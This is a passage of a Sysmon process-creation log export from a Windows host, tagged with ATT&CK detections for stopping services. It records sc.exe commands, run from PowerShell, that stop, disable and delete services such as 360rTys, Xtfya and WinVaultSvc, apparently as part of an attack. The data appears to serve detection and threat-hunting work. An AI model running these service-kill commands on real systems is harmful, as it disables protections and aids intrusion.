+CommandLine: ""C:\Windows\system32\sc.exe"" Delete 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.085815500Z"",""eventRecordID"":""2130"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.084\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010ad751900}\r\nProcessId: 4052\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.084"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010ad751900}"",""processId"":""4052"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.494",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.074 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e5741900} +ProcessId: 3408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.076352600Z"",""eventRecordID"":""2129"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.074\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e5741900}\r\nProcessId: 3408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.074"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010e5741900}"",""processId"":""3408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.431",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.043 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00108c721900} +ProcessId: 4508 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.045267900Z"",""eventRecordID"":""2126"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.043\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00108c721900}\r\nProcessId: 4508\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.043"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00108c721900}"",""processId"":""4508"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.384",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.012 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00102e701900} +ProcessId: 6228 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.014260800Z"",""eventRecordID"":""2123"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.012\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00102e701900}\r\nProcessId: 6228\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.012"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00102e701900}"",""processId"":""6228"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.368",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.000 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010646f1900} +ProcessId: 7076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfya Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.003416300Z"",""eventRecordID"":""2122"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.000\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010646f1900}\r\nProcessId: 7076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfya Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.000"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010646f1900}"",""processId"":""7076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfya Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.337",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.974 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010d26d1900} +ProcessId: 6836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:34.976068500Z"",""eventRecordID"":""2120"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:34.974\r\nProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010d26d1900}\r\nProcessId: 6836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:34.974"",""processGuid"":""{df9fc3d3-b35e-5ecf-0000-0010d26d1900}"",""processId"":""6836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.290",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:34.942 +ProcessGuid: {df9fc3d3-b35e-5ecf-0000-0010776b1900} +ProcessId: 6208 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinVaultSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 